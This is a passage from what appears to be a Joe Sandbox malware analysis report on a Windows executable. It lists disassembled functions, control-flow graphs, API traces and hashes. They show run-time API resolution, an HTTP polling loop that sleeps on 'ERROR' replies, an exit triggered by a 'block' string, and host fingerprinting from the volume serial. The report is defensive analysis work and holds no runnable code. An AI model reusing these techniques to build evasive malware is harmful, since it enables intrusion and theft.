                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 49d313d44bdc2cc21f704a16cf74ab56d5b65dbe10c873b569877466a4f9e48d
                      • Instruction ID: 09195dc73ec229a4b12212fc03d04d0ab56f39862070adf723894c03b26f29e3
                      • Opcode Fuzzy Hash: 49d313d44bdc2cc21f704a16cf74ab56d5b65dbe10c873b569877466a4f9e48d
                      • Instruction Fuzzy Hash: ACD05E75D0430CDBCB04DFE0D8496DDBBB8FB48312F000554D90962340EA3058C2CAA6
                      Function 00749C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 633 749c10-749c1a 634 74a036-74a0ca LoadLibraryA * 8 633->634 635 749c20-74a031 GetProcAddress * 43 633->635 636 74a146-74a14d 634->636 637 74a0cc-74a141 GetProcAddress * 5 634->637 635->634 638 74a216-74a21d 636->638 639 74a153-74a211 GetProcAddress * 8 636->639 637->636 640 74a21f-74a293 GetProcAddress * 5 638->640 641 74a298-74a29f 638->641 639->638 640->641 642 74a2a5-74a332 GetProcAddress * 6 641->642 643 74a337-74a33e 641->643 642->643 644 74a344-74a41a GetProcAddress * 9 643->644 645 74a41f-74a426 643->645 644->645 646 74a4a2-74a4a9 645->646 647 74a428-74a49d GetProcAddress * 5 645->647 648 74a4dc-74a4e3 646->648 649 74a4ab-74a4d7 GetProcAddress * 2 646->649 647->646 650 74a515-74a51c 648->650 651 74a4e5-74a510 GetProcAddress * 2 648->651 649->648 652 74a612-74a619 650->652 653 74a522-74a60d GetProcAddress * 10 650->653 651->650 654 74a67d-74a684 652->654 655 74a61b-74a678 GetProcAddress * 4 652->655 653->652 656 74a686-74a699 GetProcAddress 654->656 657 74a69e-74a6a5 654->657 655->654 656->657 658 74a6a7-74a703 GetProcAddress * 4 657->658 659 74a708-74a709 657->659 658->659
                      APIs
                      • GetProcAddress.KERNEL32(75900000,013D69C0), ref: 00749C2D
                      • GetProcAddress.KERNEL32(75900000,013D6680), ref: 00749C45
                      • GetProcAddress.KERNEL32(75900000,013E8FA0), ref: 00749C5E
                      • GetProcAddress.KERNEL32(75900000,013E8F28), ref: 00749C76
                      • GetProcAddress.KERNEL32(75900000,013EC930), ref: 00749C8E
                      • GetProcAddress.KERNEL32(75900000,013ECAC8), ref: 00749CA7
                      • GetProcAddress.KERNEL32(75900000,013DAFA0), ref: 00749CBF
                      • GetProcAddress.KERNEL32(75900000,013EC828), ref: 00749CD7
                      • GetProcAddress.KERNEL32(75900000,013EC9F0), ref: 00749CF0
                      • GetProcAddress.KERNEL32(75900000,013ECA80), ref: 00749D08
                      • GetProcAddress.KERNEL32(75900000,013EC978), ref: 00749D20
                      • GetProcAddress.KERNEL32(75900000,013D6760), ref: 00749D39
                      • GetProcAddress.KERNEL32(75900000,013D6780), ref: 00749D51
                      • GetProcAddress.KERNEL32(75900000,013D67A0), ref: 00749D69
                      • GetProcAddress.KERNEL32(75900000,013D67C0), ref: 00749D82
                      • GetProcAddress.KERNEL32(75900000,013EC810), ref: 00749D9A
                      • GetProcAddress.KERNEL32(75900000,013EC9C0), ref: 00749DB2
                      • GetProcAddress.KERNEL32(75900000,013DB0B8), ref: 00749DCB
                      • GetProcAddress.KERNEL32(75900000,013D67E0), ref: 00749DE3
                      • GetProcAddress.KERNEL32(75900000,013ECA98), ref: 00749DFB
                      • GetProcAddress.KERNEL32(75900000,013EC918), ref: 00749E14
                      • GetProcAddress.KERNEL32(75900000,013EC948), ref: 00749E2C
                      • GetProcAddress.KERNEL32(75900000,013EC8A0), ref: 00749E44
                      • GetProcAddress.KERNEL32(75900000,013D6800), ref: 00749E5D
                      • GetProcAddress.KERNEL32(75900000,013ECA38), ref: 00749E75
                      • GetProcAddress.KERNEL32(75900000,013ECAB0), ref: 00749E8D
                      • GetProcAddress.KERNEL32(75900000,013EC8B8), ref: 00749EA6
                      • GetProcAddress.KERNEL32(75900000,013EC840), ref: 00749EBE
                      • GetProcAddress.KERNEL32(75900000,013EC960), ref: 00749ED6
                      • GetProcAddress.KERNEL32(75900000,013EC858), ref: 00749EEF
                      • GetProcAddress.KERNEL32(75900000,013ECA50), ref: 00749F07
                      • GetProcAddress.KERNEL32(75900000,013EC990), ref: 00749F1F
                      • GetProcAddress.KERNEL32(75900000,013EC9D8), ref: 00749F38
                      • GetProcAddress.KERNEL32(75900000,013E9EA8), ref: 00749F50
                      • GetProcAddress.KERNEL32(75900000,013ECA08), ref: 00749F68
                      • GetProcAddress.KERNEL32(75900000,013EC8E8), ref: 00749F81
                      • GetProcAddress.KERNEL32(75900000,013D6820), ref: 00749F99
                      • GetProcAddress.KERNEL32(75900000,013EC9A8), ref: 00749FB1
                      • GetProcAddress.KERNEL32(75900000,013D6840), ref: 00749FCA
                      • GetProcAddress.KERNEL32(75900000,013ECAE0), ref: 00749FE2
                      • GetProcAddress.KERNEL32(75900000,013ECA68), ref: 00749FFA
                      • GetProcAddress.KERNEL32(75900000,013D6520), ref: 0074A013
                      • GetProcAddress.KERNEL32(75900000,013D6340), ref: 0074A02B
                      • LoadLibraryA.KERNEL32(013ECA20,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A03D
                      • LoadLibraryA.KERNEL32(013ECAF8,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A04E
                      • LoadLibraryA.KERNEL32(013EC870,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A060
                      • LoadLibraryA.KERNEL32(013EC888,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A072
                      • LoadLibraryA.KERNEL32(013EC8D0,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A083
                      • LoadLibraryA.KERNEL32(013EC900,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A095
                      • LoadLibraryA.KERNEL32(013ECCA8,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A0A7
                      • LoadLibraryA.KERNEL32(013ECB58,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A0B8
                      • GetProcAddress.KERNEL32(75FD0000,013D64A0), ref: 0074A0DA
                      • GetProcAddress.KERNEL32(75FD0000,013ECCD8), ref: 0074A0F2
                      • GetProcAddress.KERNEL32(75FD0000,013E8810), ref: 0074A10A
                      • GetProcAddress.KERNEL32(75FD0000,013ECDB0), ref: 0074A123
                      • GetProcAddress.KERNEL32(75FD0000,013D6280), ref: 0074A13B
                      • GetProcAddress.KERNEL32(734B0000,013DB310), ref: 0074A160
                      • GetProcAddress.KERNEL32(734B0000,013D6320), ref: 0074A179
                      • GetProcAddress.KERNEL32(734B0000,013DB108), ref: 0074A191
                      • GetProcAddress.KERNEL32(734B0000,013ECC90), ref: 0074A1A9
                      • GetProcAddress.KERNEL32(734B0000,013ECCF0), ref: 0074A1C2
                      • GetProcAddress.KERNEL32(734B0000,013D64C0), ref: 0074A1DA
                      • GetProcAddress.KERNEL32(734B0000,013D63E0), ref: 0074A1F2
                      • GetProcAddress.KERNEL32(734B0000,013ECD50), ref: 0074A20B
                      • GetProcAddress.KERNEL32(763B0000,013D6360), ref: 0074A22C
                      • GetProcAddress.KERNEL32(763B0000,013D6380), ref: 0074A244
                      • GetProcAddress.KERNEL32(763B0000,013ECB88), ref: 0074A25D
                      • GetProcAddress.KERNEL32(763B0000,013ECC78), ref: 0074A275
                      • GetProcAddress.KERNEL32(763B0000,013D65E0), ref: 0074A28D
                      • GetProcAddress.KERNEL32(750F0000,013DB0E0), ref: 0074A2B3
                      • GetProcAddress.KERNEL32(750F0000,013DAEB0), ref: 0074A2CB
                      • GetProcAddress.KERNEL32(750F0000,013ECD08), ref: 0074A2E3
                      • GetProcAddress.KERNEL32(750F0000,013D64E0), ref: 0074A2FC
                      • GetProcAddress.KERNEL32(750F0000,013D6300), ref: 0074A314
                      • GetProcAddress.KERNEL32(750F0000,013DAED8), ref: 0074A32C
                      • GetProcAddress.KERNEL32(75A50000,013ECC00), ref: 0074A352
                      • GetProcAddress.KERNEL32(75A50000,013D6600), ref: 0074A36A
                      • GetProcAddress.KERNEL32(75A50000,013E88D0), ref: 0074A382
                      • GetProcAddress.KERNEL32(75A50000,013ECCC0), ref: 0074A39B
                      • GetProcAddress.KERNEL32(75A50000,013ECD20), ref: 0074A3B3
                      • GetProcAddress.KERNEL32(75A50000,013D6560), ref: 0074A3CB
                      • GetProcAddress.KERNEL32(75A50000,013D63A0), ref: 0074A3E4
                      • GetProcAddress.KERNEL32(75A50000,013ECD38), ref: 0074A3FC
                      • GetProcAddress.KERNEL32(75A50000,013ECDC8), ref: 0074A414
                      • GetProcAddress.KERNEL32(75070000,013D6480), ref: 0074A436
                      • GetProcAddress.KERNEL32(75070000,013ECD68), ref: 0074A44E
                      • GetProcAddress.KERNEL32(75070000,013ECDE0), ref: 0074A466
                      • GetProcAddress.KERNEL32(75070000,013ECC18), ref: 0074A47F
                      • GetProcAddress.KERNEL32(75070000,013ECD80), ref: 0074A497
                      • GetProcAddress.KERNEL32(74E50000,013D6400), ref: 0074A4B8
                      • GetProcAddress.KERNEL32(74E50000,013D6580), ref: 0074A4D1
                      • GetProcAddress.KERNEL32(75320000,013D62A0), ref: 0074A4F2
                      • GetProcAddress.KERNEL32(75320000,013ECBB8), ref: 0074A50A
                      • GetProcAddress.KERNEL32(6F060000,013D6540), ref: 0074A530
                      • GetProcAddress.KERNEL32(6F060000,013D6500), ref: 0074A548
                      • GetProcAddress.KERNEL32(6F060000,013D65A0), ref: 0074A560
                      • GetProcAddress.KERNEL32(6F060000,013ECB28), ref: 0074A579
                      • GetProcAddress.KERNEL32(6F060000,013D6420), ref: 0074A591
                      • GetProcAddress.KERNEL32(6F060000,013D6660), ref: 0074A5A9
                      • GetProcAddress.KERNEL32(6F060000,013D6440), ref: 0074A5C2
                      • GetProcAddress.KERNEL32(6F060000,013D65C0), ref: 0074A5DA
                      • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0074A5F1
                      • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0074A607
                      • GetProcAddress.KERNEL32(74E00000,013ECD98), ref: 0074A629
                      • GetProcAddress.KERNEL32(74E00000,013E8980), ref: 0074A641
                      • GetProcAddress.KERNEL32(74E00000,013ECDF8), ref: 0074A659
                      • GetProcAddress.KERNEL32(74E00000,013ECB10), ref: 0074A672
                      • GetProcAddress.KERNEL32(74DF0000,013D6620), ref: 0074A693
                      • GetProcAddress.KERNEL32(6E320000,013ECB40), ref: 0074A6B4
                      • GetProcAddress.KERNEL32(6E320000,013D6640), ref: 0074A6CD
                      • GetProcAddress.KERNEL32(6E320000,013ECC30), ref: 0074A6E5
                      • GetProcAddress.KERNEL32(6E320000,013ECB70), ref: 0074A6FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: HttpQueryInfoA$InternetSetOptionA
                      • API String ID: 2238633743-1775429166
                      • Opcode ID: e07f6d50b5a60fa50dfcc767db69598b2cb2bd425a5657a04d8a9f3b9988797c
                      • Instruction ID: dd93013a2c9dee22fa6d5496fada8367318fc83867a585dff32fd54f26967be4
                      • Opcode Fuzzy Hash: e07f6d50b5a60fa50dfcc767db69598b2cb2bd425a5657a04d8a9f3b9988797c
                      • Instruction Fuzzy Hash: 10622DB792C200AFC348DFA8ED8999E37F9F7CC601B14451AA61DC3264D63994C1EB53
                      Function 00745510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 858 745510-745577 call 745ad0 call 74a820 * 3 call 74a740 * 4 874 74557c-745583 858->874 875 745585-7455b6 call 74a820 call 74a7a0 call 731590 call 7451f0 874->875 876 7455d7-74564c call 74a740 * 2 call 731590 call 7452c0 call 74a8a0 call 74a800 call 74aad0 StrCmpCA 874->876 891 7455bb-7455d2 call 74a8a0 call 74a800 875->891 902 745693-7456a9 call 74aad0 StrCmpCA 876->902 906 74564e-74568e call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 876->906 891->902 907 7457dc-745844 call 74a8a0 call 74a820 * 2 call 731670 call 74a800 * 4 call 746560 call 731550 902->907 908 7456af-7456b6 902->908 906->902 1039 745ac3-745ac6 907->1039 910 7456bc-7456c3 908->910 911 7457da-74585f call 74aad0 StrCmpCA 908->911 914 7456c5-745719 call 74a820 call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 910->914 915 74571e-745793 call 74a740 * 2 call 731590 call 7452c0 call 74a8a0 call 74a800 call 74aad0 StrCmpCA 910->915 929 745865-74586c 911->929 930 745991-7459f9 call 74a8a0 call 74a820 * 2 call 731670 call 74a800 * 4 call 746560 call 731550 911->930 914->911 915->911 1018 745795-7457d5 call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 915->1018 936 745872-745879 929->936 937 74598f-745a14 call 74aad0 StrCmpCA 929->937 930->1039 943 7458d3-745948 call 74a740 * 2 call 731590 call 7452c0 call 74a8a0 call 74a800 call 74aad0 StrCmpCA 936->943 944 74587b-7458ce call 74a820 call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 936->944 966 745a16-745a21 Sleep 937->966 967 745a28-745a91 call 74a8a0 call 74a820 * 2 call 731670 call 74a800 * 4 call 746560 call 731550 937->967 943->937 1042 74594a-74598a call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 943->1042 944->937 966->874 967->1039 1018->911 1042->937
                      APIs
                        • Part of subcall function 0074A820: lstrlen.KERNEL32(00734F05,?,?,00734F05,00750DDE), ref: 0074A82B
                        • Part of subcall function 0074A820: lstrcpy.KERNEL32(00750DDE,00000000), ref: 0074A885
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007456A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745857
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745228
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 007452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745318
                        • Part of subcall function 007452C0: lstrlen.KERNEL32(00000000), ref: 0074532F
                        • Part of subcall function 007452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00745364
                        • Part of subcall function 007452C0: lstrlen.KERNEL32(00000000), ref: 00745383
                        • Part of subcall function 007452C0: lstrlen.KERNEL32(00000000), ref: 007453AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0074578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745A0C
                      • Sleep.KERNEL32(0000EA60), ref: 00745A1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 507064821-2791005934
                      • Opcode ID: 7c6d5cf5ff25d6644a63b997efea93530a2d18f9e8c00ce3348b15466736b10b
                      • Instruction ID: d939a94f27319c01a19431612def871eeaf27ba9c0049f8f656bcd2899b21e5f
                      • Opcode Fuzzy Hash: 7c6d5cf5ff25d6644a63b997efea93530a2d18f9e8c00ce3348b15466736b10b
                      • Instruction Fuzzy Hash: 21E11172950104EBEB15FBB0DC9AAED737CAF94300F508528B51666192EF3C6B4DCB92
                      Function 007417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1069 7417a0-7417cd call 74aad0 StrCmpCA 1072 7417d7-7417f1 call 74aad0 1069->1072 1073 7417cf-7417d1 ExitProcess 1069->1073 1077 7417f4-7417f8 1072->1077 1078 7419c2-7419cd call 74a800 1077->1078 1079 7417fe-741811 1077->1079 1080 741817-74181a 1079->1080 1081 74199e-7419bd 1079->1081 1083 741835-741844 call 74a820 1080->1083 1084 741970-741981 StrCmpCA 1080->1084 1085 7418f1-741902 StrCmpCA 1080->1085 1086 741951-741962 StrCmpCA 1080->1086 1087 741932-741943 StrCmpCA 1080->1087 1088 741913-741924 StrCmpCA 1080->1088 1089 74185d-74186e StrCmpCA 1080->1089 1090 74187f-741890 StrCmpCA 1080->1090 1091 741821-741830 call 74a820 1080->1091 1092 7418ad-7418be StrCmpCA 1080->1092 1093 7418cf-7418e0 StrCmpCA 1080->1093 1094 74198f-741999 call 74a820 1080->1094 1095 741849-741858 call 74a820 1080->1095 1081->1077 1083->1081 1110 741983-741986 1084->1110 1111 74198d 1084->1111 1101 741904-741907 1085->1101 1102 74190e 1085->1102 1107 741964-741967 1086->1107 1108 74196e 1086->1108 1105 741945-741948 1087->1105 1106 74194f 1087->1106 1103 741926-741929 1088->1103 1104 741930 1088->1104 1116 741870-741873 1089->1116 1117 74187a 1089->1117 1118 741892-74189c 1090->1118 1119 74189e-7418a1 1090->1119 1091->1081 1097 7418c0-7418c3 1092->1097 1098 7418ca 1092->1098 1099 7418e2-7418e5 1093->1099 1100 7418ec 1093->1100 1094->1081 1095->1081 1097->1098 1098->1081 1099->1100 1100->1081 1101->1102 1102->1081 1103->1104 1104->1081 1105->1106 1106->1081 1107->1108 1108->1081 1110->1111 1111->1081 1116->1117 1117->1081 1120 7418a8 1118->1120 1119->1120 1120->1081
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 007417C5
                      • ExitProcess.KERNEL32 ref: 007417D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 94d1092be3b400f5ffac046df6bd38582b6afa4e2d8d24857470a7047208ad32
                      • Instruction ID: cc1f53164fe7325bf55458bc1520b5839415b28f3eec0c4d8ced6ebb502c2c61
                      • Opcode Fuzzy Hash: 94d1092be3b400f5ffac046df6bd38582b6afa4e2d8d24857470a7047208ad32
                      • Instruction Fuzzy Hash: C8518CB5B1420AEFDB04EFA1D954AFE77B9BF44304F508048E806A7340D778E985DB62
                      Function 00747500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1124 747500-74754a GetWindowsDirectoryA 1125 747553-7475c7 GetVolumeInformationA call 748d00 * 3 1124->1125 1126 74754c 1124->1126 1133 7475d8-7475df 1125->1133 1126->1125 1134 7475e1-7475fa call 748d00 1133->1134 1135 7475fc-747617 GetProcessHeap RtlAllocateHeap 1133->1135 1134->1133 1137 747628-747658 wsprintfA call 74a740 1135->1137 1138 747619-747626 call 74a740 1135->1138 1145 74767e-74768e 1137->1145 1138->1145
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00747542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0074760A
                      • wsprintfA.USER32 ref: 00747640
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\$u
                      • API String ID: 1544550907-2991394348
                      • Opcode ID: 1aaa221617ebd7d13cdb5689b00eab069ca6bbbf3411f64960102b5abaab6e1a
                      • Instruction ID: 23b634493e773334394aa06b5a73aa5c6b395422f22b088f494553b94769600f
                      • Opcode Fuzzy Hash: 1aaa221617ebd7d13cdb5689b00eab069ca6bbbf3411f64960102b5abaab6e1a
                      • Instruction Fuzzy Hash: 8D4182B1D04248EBDB14DF94DC49BEEBBB8EF48704F104199F5096B280D7786A84CFA6
                      Function 007469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0750), ref: 007498A1
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0798), ref: 007498BA
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0618), ref: 007498D2
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0630), ref: 007498EA
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0558), ref: 00749903
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E8940), ref: 0074991B
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013D66A0), ref: 00749933
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013D6720), ref: 0074994C
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0810), ref: 00749964
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E07B0), ref: 0074997C
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0570), ref: 00749995
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E07C8), ref: 007499AD
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013D68A0), ref: 007499C5
